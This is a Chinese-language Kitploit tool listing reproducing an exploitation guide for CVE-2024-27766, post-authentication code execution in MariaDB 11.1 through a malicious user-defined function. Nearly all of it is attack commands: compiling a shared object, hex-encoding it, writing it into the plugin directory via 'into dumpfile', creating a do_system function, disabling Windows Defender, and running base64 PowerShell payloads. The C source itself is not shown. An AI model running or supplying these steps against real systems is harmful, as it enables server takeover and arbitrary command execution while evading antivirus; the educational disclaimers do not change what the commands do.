Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Mysql_CVE-2024-27766 — 数据库认证后的代码执行 | Kitploit
工具/GitHubGitHub/hissec/mysql_cve-2024-27766
漏洞分析漏洞利用渗透测试学习与教育Payload 开发数据库安全
GitHubhissec/mysql_cve-2024-27766

Mysql_CVE-2024-27766

数据库认证后的代码执行

查看仓库
132年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

漏洞复现指南(受影响产品版本 MariaDB 11.1)

本指南提供了在数据库系统上复现用户自定义函数(UDF)攻击的分步说明。请注意,该漏洞利用在某些系统上可能有效,但在64位架构或特定构建版本上可能无法正常运作。

警告: 本文仅用于教育目的。未经授权使用这些技术是非法且不道德的。

复现攻击的步骤

1. 下载并准备UDF代码

首先,创建一个名为 exploit.c 的文件,并添加以下代码:

root@kitploit:~

### 2. 编译UDF代码

使用 `x86_64-w64-mingw32-gcc` 编译器编译漏洞利用代码:

```bash
x86_64-w64-mingw32-gcc -g -c exploit.c

3. 创建共享对象文件

从编译后的对象文件生成共享对象文件(exploit.so):

root@kitploit:~
x86_64-w64-mingw32-gcc -g -shared -Wl,-soname,exploit.so -o exploit.so exploit.o

4. 将共享对象文件转换为十六进制格式

使用 xxd 将 .so 文件转换为十六进制格式:

root@kitploit:~
xxd -p exploit.so | tr -d '\n' > hex_value.txt

5. 将十六进制值加载到数据库中

从 hex_value.txt 复制十六进制值,并在数据库中执行以下命令:

root@kitploit:~
DB> set @shell = 0x<hex_value>;

6. 确定插件目录并部署漏洞利用

通过运行以下命令查找插件目录:

root@kitploit:~
DB> select @@plugin_dir;

然后,在插件目录中创建漏洞利用共享对象:

root@kitploit:~
DB> select binary @shell into dumpfile 'C:\\Program Files\\MariaDB 11.1\\lib\\plugin\\exploit.so';

注意: 请根据系统配置或具体的插件目录调整路径。

7. 创建恶意函数

在数据库中使用漏洞利用创建一个新函数:

root@kitploit:~
DB> create function do_system returns integer soname 'exploit.so';

8. 执行漏洞利用

禁用可能阻止漏洞利用的杀毒软件或 Windows Defender。然后,使用新创建的函数运行命令:

root@kitploit:~
DB> select do_system('powershell base64 here');

将 'powershell base64 here' 替换为你希望执行的命令的 Base64 编码负载。


免责声明: 本文档仅供教育目的和安全研究使用。滥用此信息可能导致刑事指控和严重的法律处罚。在测试任何网络或系统的漏洞之前,请务必获得相关权限。

下载工具